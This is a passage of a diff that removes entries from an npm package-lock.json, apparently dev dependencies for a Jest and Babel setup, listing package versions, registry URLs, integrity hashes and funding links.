"sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "dev": true, - "dependencies": { - "wrappy": "1" - } - }, - "node_modules/onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", - "dev": true, - "dependencies": { - "mimic-fn": "^2.1.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "dependencies": { - "yocto-queue": "^0.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "dependencies": { - "p-limit": "^2.2.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/p-locate/node_modules/p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "dependencies": { - "p-try": "^2.0.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true - }, - "node_modules/picocolors": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.0.0.tgz", - "integrity": "sha512-1fygroTLlHu66zi26VoTDv8yRgm0Fccecssto+MhsZ0D/DGW2sm8E8AjW7NU5VVTRt5GxbeZ5qBuJr+HyLYkjQ==", - "dev": true - }, - "node_modules/picomatch": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", - "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", - "dev": true, - "engines": { - "node": ">=8.6" - }, - "funding": { - "url": "https://github.com/sponsors/jonschlinkert" - } - }, - "node_modules/pirates": { - "version": "4.0.6", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.6.tgz", - "integrity": "sha512-saLsH7WeYYPiD25LDuLRRY/i+6HaPYr6G1OUlN39otzkSTxKnubR9RTxS3/Kk50s1g2JTgFwWQDQyplC5/SHZg==", - "dev": true, - "engines": { - "node": ">= 6" - } - }, - "node_modules/pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", - "dev": true, - "dependencies": { - "find-up": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/pretty-format": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.6.1.tgz", - "integrity": "sha512-7jRj+yXO0W7e4/tSJKoR7HRIHLPPjtNaUGG2xxKQnGvPNRkgWcQ0AZX6P4KBRJN4FcTBWb3sa7DVUJmocYuoog==", - "dev": true, - "dependencies": { - "@jest/schemas": "^29.6.0", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/pretty-format/node_modules/ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", - "dev": true, - "dependencies": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/pure-rand": { - "version": "6.0.2", - "resolved": "https://registry.npmjs.org/pure-rand/-/pure-rand-6.0.2.tgz", - "integrity": "sha512-6Yg0ekpKICSjPswYOuC5sku/TSWaRYlA0qsXqJgM/d/4pLPHPuTxK7Nbf7jFKzAeedUhR8C7K9Uv63FBsSo8xQ==", - "dev": true, - "funding": [ - { - "type": "individual", - "url": "https://github.com/sponsors/dubzzz" - }, - { - "type": "opencollective", - "url": "https://opencollective.com/fast-check" - } - ] - }, - "node_modules/react-is": { - "version": "18.2.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", - "dev": true - }, - "node_modules/require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/resolve": { - "version": "1.22.2", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.2.tgz", - "integrity": "sha512-Sb+mjNHOULsBv818T40qSPeRiuWLyaGMa5ewydRLFimneixmVy2zdivRl+AF6jaYPC8ERxGDmFSiqui6SfPd+g==", - "dev": true, - "dependencies": { - "is-core-module": "^2.11.0", - "path-parse": "^1.0.7", - "supports-preserve-symlinks-flag": "^1.0.0" - }, - "bin": { - "resolve": "bin/resolve" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", - "dev": true, - "dependencies": { - "resolve-from": "^5.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve.exports": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.2.tgz", - "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - } - }, - "node_modules/shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "dev": true, - "dependencies": { - "shebang-regex": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", - "dev": true - }, - "node_modules/sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", - "dev": true - }, - "node_modules/slash": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", - "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", - "dev": true, - "dependencies": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" - } - }, - "node_modules/sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==", - "dev": true - }, - "node_modules/stack-utils": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", - "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", - "dev": true, - "dependencies": { - "escape-string-regexp": "^2.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "dependencies": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dev": true, - "dependencies": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dev": true, - "dependencies": { - "ansi-regex": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/supports-color": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", - "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/supports-preserve-symlinks-flag": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", - "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", - "dev": true, - "engines": { - "node": ">= 0.4" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", - "dev": true, - "dependencies": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "node_modules/to-fast-properties": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/to-fast-properties/-/to-fast-properties-2.0.0.tgz", - "integrity": "sha512-/OaKK0xYrs3DmxRYqL/yDc+FxFUVYhDlXMhRmv3z915w2HF1tnN1omB354j8VUGO/hbRzyD6Y3sA7v7GS/ceog==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/to-regex-range": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", - "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", - "dev": true, - "dependencies": { - "is-number": "^7.0.0" - }, - "engines": { - "node": ">=8.0" - } - }, - "node_modules/type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/update-browserslist-db": { - "version": "1.0.11", - "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.0.11.tgz", - "integrity": "sha512-dCwEFf0/oT85M1fHBg4F0jtLwJrutGoHSQXCh7u4o2t1drG+c0a9Flnqww6XUKSfQMPpJBRjU8d4RXB09qtvaA==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/browserslist" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ], - "dependencies": { - "escalade": "^3.1.1", - "picocolors": "^1.0.0" - }, - "bin": { - "update-browserslist-db": "cli.js" - }, - "peerDependencies": { - "browserslist": ">= 4.21.0" - } - }, - "node_modules/v8-to-istanbul": { - "version": "9.1.0", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.1.0.tgz", - "integrity": "sha512-6z3GW9x8G1gd+JIIgQQQxXuiJtCXeAjp6RaPEPLv62mH3iPHPxV6W3robxtCzNErRo6ZwTmzWhsbNvjyEBKzKA==", - "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^1.6.0" - }, - "engines": { - "node": ">=10.12.0" - } - }, - "node_modules/v8-to-istanbul/node_modules/convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - }, - "node_modules/walker": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "dependencies": { - "makeerror": "1.0.12" - } - }, - "node_modules/which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "dev": true, - "dependencies": { - "isexe": "^2.0.0" - }, - "bin": { - "node-which": "bin/node-which" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dev": true, - "dependencies": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" - } - }, - "node_modules/wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", - "dev": true - }, - "node_modules/write-file-atomic": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-4.0.2.tgz", - "integrity": "sha512-7KxauUdBmSdWnmpaGFg+ppNjKF8uNLry8LyzjauQDOVONfFLNKrKvQOxZ/VuTIcS/gge/YNahf5RIIQWTSarlg==", - "dev": true, - "dependencies": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || >=16.0.0" - } - }, - "node_modules/y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/yallist": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", - "dev": true - }, - "node_modules/yargs": { - "version": "17.7.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", - "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", - "dev": true, - "dependencies": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true, - "engines": { - "node": ">=12" - } - }, - "node_modules/yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - } - }, - "dependencies": { - "@ampproject/remapping": { - "version": "2.2.1", - "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.2.1.tgz", - "integrity": "sha512-lFMjJTrFL3j7L9yBxwYfCq2k6qqwHyzuUl/XBnif78PWTJYyL/dfowQHWE3sp6U6ZzqWiiIZnpTMO96zhkjwtg==", - "dev": true, - "requires": { - "@jridgewell/gen-mapping": "^0.3.0", - "@jridgewell/trace-mapping": "^0.3.9" - } - }, - "@babel/code-frame": { - "version": "7.22.13", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.22.13.tgz", - "integrity": "sha512-XktuhWlJ5g+3TJXc5upd9Ks1HutSArik6jf2eAjYFyIOf4ej3RN+184cZbzDvbPnuTJIUhPKKJE3cIsYTiAT3w==", - "dev": true, - "requires": { - "@babel/highlight": "^7.22.13", - "chalk": "^2.4.2" - }, - "dependencies": { - "ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "requires": { - "color-convert": "^1.9.0" - } - }, - "chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "requires": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - } - }, - "color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "requires": { - "color-name": "1.1.3" - } - }, - "color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true - }, - "has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true - }, - "supports-color": { - "version": "5.5.0", - "resolved": 